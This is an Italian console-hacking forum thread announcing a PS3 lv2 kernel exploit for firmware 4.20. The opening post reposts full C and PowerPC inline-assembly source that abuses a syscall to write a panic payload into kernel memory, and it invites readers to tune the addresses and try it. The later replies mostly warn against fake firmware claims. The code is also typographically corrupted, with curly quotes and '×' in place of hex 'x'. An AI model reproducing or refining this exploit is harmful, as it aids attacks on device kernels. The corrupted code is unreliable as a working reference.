Pagina 1 di 5 123 ... UltimaUltima
Risultati da 1 a 10 di 43

Discussione: Nuovo Exploit Lv2 4.20

  1. #1
    Senior Member L'avatar di sid01993
    Data Registrazione
    03-01-12
    Località
    Terra
    Messaggi
    341

    Nuovo Exploit Lv2 4.20

    Il coder KDSBest rilascia un nuovo exploit per lv2 che sembrerebbe funzionare su 4.20,
    al momento questo exploit serve solo a far crashare la console, ma è un ottimo inizio per la costruzione di un nuovo Custom Firmware su firmware superiori al 3.55

    ince @naehrwert posted an lv2 exploit I will do so too . The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don’t know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^

    //compile: ppu-gcc kds2.c -o kds2.elf
    //or: ppu-lv2-gcc kds2.c -o kds2.elf

    register unsigned long long payloadHolder2 asm (“r21″);
    register unsigned long long payloadHolder asm (“r20″);
    register unsigned long long stackpointer asm (“r1″);
    register unsigned long long counter asm (“r25″);
    register unsigned long long bufferStackpointer asm (“r26″);

    int __volatile__ main(int argc, const char* argv[])
    {
    // backup Stack pointer
    bufferStackpointer = stackpointer;

    payloadHolder = 0x3960024F3960024FUL;
    payloadHolder2 = 0x4400000244000002UL;

    // Incrementer
    counter = 0×00;

    // Play with that address till the panic is executed, I lack of time todo so
    // add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
    stackpointer = 0x8000000000000100UL;
    doItAgain:
    // KDSBest Payload
    // Prepare for our Syscall

    asm(“li %r0, 0×0″);
    asm(“li %r3, 0×6″);
    asm(“li %r4, 0×1″);
    // li r11, 0x24F -> PANIC
    asm(“mr %r22, %r20″);
    asm(“mr %r23, %r20″);
    asm(“mr %r24, %r20″);
    asm(“mr %r27, %r20″);
    asm(“mr %r28, %r20″);
    asm(“mr %r29, %r20″);
    asm(“mr %r30, %r20″);
    asm(“mr %r31, %r20″);

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm(“li %r11, 0xA9″);
    asm(“sc”);
    counter += 0×04;

    // We write sc
    asm(“mr %r22, %r21″);
    asm(“mr %r23, %r21″);
    asm(“mr %r24, %r21″);
    asm(“mr %r27, %r21″);
    asm(“mr %r28, %r21″);
    asm(“mr %r29, %r21″);
    asm(“mr %r30, %r21″);
    asm(“mr %r31, %r21″);

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm(“li %r11, 0xA9″);
    asm(“sc”);
    counter += 0×04;

    if(counter < 0×1000000)
    goto doItAgain;

    stackpointer = bufferStackpointer;
    return 0;
    }

    I didn’t managed to make it work on 4.21 so I just did on 4.20

  2. #2
    Senior Member L'avatar di Gamerexpert
    Data Registrazione
    19-10-11
    Località
    Nel Nulla....
    Messaggi
    765
    Tranquilli... tempo ci vuole, ma uscirà per tutti vedrete.

    PS: Prima però dovranno concludere tutti gli aggiornamenti credo, dopo si potrà avere tutto.
    忍者
    PS3の秘密

  3. #3

    Data Registrazione
    18-12-11
    Messaggi
    3,611
    Notizia da seguire:unsisi:

    Ricevere un grazie dopo aver aiutato qualcuno fa sempre piacere.

  4. #4
    L'avatar di Prometheus_91
    Data Registrazione
    20-12-11
    Località
    Dove tutto ebbe inizio...
    Messaggi
    4,207
    in effetti la notizia gira da un pò di giorni ormai!
    L'universo è cambiamento; la nostra vita è il risultato dei nostri pensieri.

  5. #5
    Extreme User
    Data Registrazione
    10-09-11
    Messaggi
    665
    arriva l'invero e iniziano a fiorire notizie su eventuali exploit e cfw... non facciamoci infinocchiare come l'anno scorso! comprai la ps3 i primi di ottobre e seguii e seguo tutt'ora la scena ps3 qui su extreme, per fortuna ho il buon kmeaw altrimenti sai quante broccate? mi ricordo ancora tutti i vari fakeman... quindi non illudiamoci, possono trovare tutti gli exploit come fu illo tempore per il fw 3.70, poi 3.72 e tutto il resto, ma se nessuno ha il coraggio di pubblicare il fw?? mamma sony sappiamo bene che sguinzaglierà i suoi pitbull con la laurea in giurisprudenza!

  6. #6
    Senior Member L'avatar di Agrippa90
    Data Registrazione
    16-05-12
    Località
    Alaska
    Messaggi
    1,164
    eh vabbè ora iniziano i festival dei fakeman ........non date molto credito a ste cose , di solito è tutto fumo.

  7. #7
    L'avatar di Ace
    Data Registrazione
    31-01-14
    Messaggi
    9,977
    Postare rumors va bene, però parlo all'intera utenza: non commettiamo gli stessi errori del passato. Non credete ad ogni foto, video o messia che dice che ha creato il nuovo cfw. Seguiamo la vicenda in maniera critica e oggettiva.
    Se vi sono stato utile e non sapete come sdebitarvi io vi consiglio di ascoltare il mio amico qui vicino. In fondo cliccare su una stella non costa nulla

  8. #8

    Data Registrazione
    06-01-12
    Messaggi
    491
    quoto ace...
    e per ora a quanto pare non sanno neanke cosa farsene di questo exploit...
    io aspetto natale e poi vedi come vola la ps3....nuovo anno abbandono sony definitivamente..e se mai uscirà una consolle unica nel suo genere ..la comprerò soltanto dopo che l avranno ackerata..:D

  9. #9
    Senior Member L'avatar di Belmont
    Data Registrazione
    08-09-11
    Messaggi
    1,078
    straquoto! l anno scorso c è stato tutto un polverone...di balle e falsi!! andiamoci cauti e non lasciamoci trasportare...

  10. #10
    L'avatar di Prometheus_91
    Data Registrazione
    20-12-11
    Località
    Dove tutto ebbe inizio...
    Messaggi
    4,207
    stiamo arrivando di nuovo a natale ahaha fakeman in azione
    L'universo è cambiamento; la nostra vita è il risultato dei nostri pensieri.

Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •